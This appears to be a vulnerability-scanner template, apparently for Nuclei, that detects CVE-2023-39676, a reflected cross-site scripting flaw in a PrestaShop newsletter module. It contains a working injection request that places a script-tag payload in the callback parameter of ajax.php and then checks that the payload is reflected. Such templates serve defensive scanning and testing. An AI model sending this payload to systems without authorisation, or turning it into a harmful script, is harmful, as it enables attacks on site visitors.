28 lines
680 B
YAML
28 lines
680 B
YAML
|
id: CVE-2023-39676
|
||
|
info:
|
||
|
name: PrestaShop XSS in fieldpopupnewsletter module
|
||
|
author: meme-lord
|
||
|
severity: medium
|
||
|
description: PrestaShop module fieldpopupnewsletter is vulnerable to XSS
|
||
|
reference:
|
||
|
- https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/
|
||
|
tags: cve,cve2023,prestashop,xss
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(0)%3C/script%3E"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "<script>alert(0)</script>"
|
||
|
- "Invalid email"
|
||
|
condition: and
|